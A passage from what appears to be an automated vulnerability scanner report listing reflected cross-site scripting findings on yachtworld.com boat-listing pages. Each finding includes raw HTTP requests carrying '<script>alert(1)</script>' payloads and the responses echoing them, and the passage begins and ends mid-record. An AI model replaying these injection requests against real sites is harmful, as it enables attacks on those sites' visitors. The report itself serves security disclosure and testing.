Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:05:00 GMT
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=1930392&boat_id=1930392&back=/core/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-Statesdb200"><script>alert(1)</script>b62163eb756&boat_id=1930392">
...[SNIP]...

3.92. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 848cf"><script>alert(1)</script>c7c6ac147ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States?848cf"><script>alert(1)</script>c7c6ac147ce=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:03 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 25 Jan 2011 16:08:22 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:03 GMT
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&848cf"><script>alert(1)</script>c7c6ac147ce=1&units=Feet&seo=0&checked_boats=1930392&boat_id=1930392&back=/core/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States&boat_id=1930392">
...[SNIP]...

3.93. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 234c4"><script>alert(1)</script>97cd139ab78 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-2305173/Gloucester234c4"><script>alert(1)</script>97cd139ab78/VA/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:02:50 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 06:03:33 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:02:50 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2305173&boat_id=2305173&back=/core/boats/2004/Regulator-32-Fs-2305173/Gloucester234c4"><script>alert(1)</script>97cd139ab78/VA/United-States&boat_id=2305173">
...[SNIP]...

3.94. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a142d"><script>alert(1)</script>12c59d7a8be was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-2305173/Gloucester/VAa142d"><script>alert(1)</script>12c59d7a8be/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; 